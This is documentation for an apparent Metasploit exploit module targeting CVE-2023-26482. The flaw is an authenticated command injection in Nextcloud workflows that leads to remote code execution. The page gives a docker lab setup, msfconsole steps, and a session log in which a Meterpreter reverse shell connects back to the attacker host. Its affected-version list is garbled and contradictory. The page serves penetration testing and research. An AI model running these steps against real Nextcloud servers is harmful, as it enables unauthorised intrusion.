adam/metasploit-gs
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Files
c23c848d2eeffa5a01dfdcdafa63340002b06eb9
metasploit-gs/documentation/modules/exploit/unix/webapp/nextcloud_workflows_rce.md
T
whotwagner 2259de33c1 Fixed a txpo in nextcloud_workflows_rce.md
2025-05-14 13:40:47 +00:00

4.7 KiB
Raw Blame History

Description

This module exploits a command injection that leads to a remote execution in Nextcloud installations if the app Workflow External Scripts is also installed. The vulnerability affects Nextcloud versions >= 24.0.0, >= 25.0.0, >= 18.0.0, >= 19.0.0, >= 20.0.0, >= 21.0.0, >= 22.0.0, >= 23.0.0, >= 24.0.0, >= 25.0.0

A missing scope validation allowed users to create workflows which are designed to be only available for administrators. In combination with Workflow External Script, this vulnerability leads to authenticated remote command execution.

More about the vulnerability detail: CVE-2023-26482.

The module will automatically use cmd/linux/http/x64/meterpreter/reverse_tcp payload.

The module will check if the target is vulnerable, by adding and removing a dummy-workflow.

Vulnerable Application

Nextcloud is a suite of client-server software for creating and using file hosting services.

This module has been tested successfully on Nextcloud versions:

  • Nextcloud version 24.0.5

Source and Installers

Docker Installation

This exploit was tested using a nextcloud docker container and docker-compose with the following docker-compose.yml:

volumes:
  nextcloud:
  db:

services:
  db:
    image: mariadb:10.6
    restart: always
    command: --transaction-isolation=READ-COMMITTED --log-bin=binlog --binlog-format=ROW
    volumes:
      - db:/var/lib/mysql
    environment:
      - MARIADB_ROOT_PASSWORD=root
      - MARIADB_PASSWORD=root
      - MARIADB_DATABASE=nextcloud
      - MARIADB_USER=nextcloud

  app:
    image: nextcloud:24.0.5
    restart: always
    ports:
      - 8080:80
    links:
      - db
    environment:
      - MYSQL_PASSWORD=root
      - MYSQL_DATABASE=nextcloud
      - MYSQL_USER=root
      - MYSQL_HOST=db
      - NEXTCLOUD_ADMIN_PASSWORD=admin
      - NEXTCLOUD_ADMIN_USER=admin
      - NEXTCLOUD_TRUSTED_DOMAINS="192.168.233.64:8080"
    depends_on:
      - db

NOTE: Change the IP-address and port for NEXTCLOUD_TRUSTED_DOMAINS for your setup

After docker compose up -d login as admin and install the workflow app: "Workflow external script" and create a low privileged user alice. Make sure that you choose "Cron(Recommended)" in the Settings for "Background Jobs". Before we can run the exploit, we need to start the cronjob. This is crucial because otherwise the payload doesn't get triggered:

docker exec -it -u www-data nextcloud-app-1 /bin/bash
watch -n2 php cron.php

Wait until you the watch-command outputs something like: "Every 2.0s: php cron.php".

Verification Steps

Example steps in this format (is also in the PR):

  1. Do: use exploit/unix/webapp/nextcloud_workflows_rce
  2. Do: set RHOSTS [ips]
  3. Do: set LHOST [lhost]
  4. Do: set RPORT 8080
  5. Do: set USERNAME alice
  6. Do: set PASSWORD alice-password
  7. Do: run
  8. You should get a shell after a while

Options

TARGETURI

Remote web path to the nextcloud installation (default: /)

USERNAME

The low-privileged username to authenticate to nextcloud

PASSWORD

The password for the low-privileged user

Scenarios

In this scenario the zoneminder-server has the IP address 192.42.0.254. The IP address of the metasploit host is 192.42.1.188.

Nextcloud 24.0.5(docker-compose)

The following demo shows how to use the exploit:

msf6 > use exploit/unix/webapp/nextcloud_workflows_rce
[*] Using configured payload cmd/linux/http/x64/meterpreter/reverse_tcp
msf6 exploit(unix/webapp/nextcloud_workflows_rce) > set RHOSTS 192.168.233.64
RHOSTS => 192.168.233.64
msf6 exploit(unix/webapp/nextcloud_workflows_rce) > set LHOST 192.168.233.117
LHOST => 192.168.233.117
msf6 exploit(unix/webapp/nextcloud_workflows_rce) > set RPORT 8080
RPORT => 8080
msf6 exploit(unix/webapp/nextcloud_workflows_rce) > set USERNAME alice
USERNAME => alice
msf6 exploit(unix/webapp/nextcloud_workflows_rce) > set PASSWORD CaeD4ohchaiv5ieDooBa
PASSWORD => CaeD4ohchaiv5ieDooBa
msf6 exploit(unix/webapp/nextcloud_workflows_rce) > run
[*] Started reverse TCP handler on 192.168.233.117:4444
[*] Sending payload..
[+] Workflow created
[*] Waiting for the payload to connect back ..
[*] Sending stage (3045380 bytes) to 192.168.233.64
[*] Meterpreter session 1 opened (192.168.233.117:4444 -> 192.168.233.64:37090) at 2025-04-10 13:27:49 +0000
[+] Payload connected!
[*] Cleaning up

meterpreter > getuid
Server username: www-data

Limitations

Ensure that your WfsDelay advanced option is set to a value that allows cron to execute the payload. Default is 16 minutes

Reference in New Issue View Git Blame Copy Permalink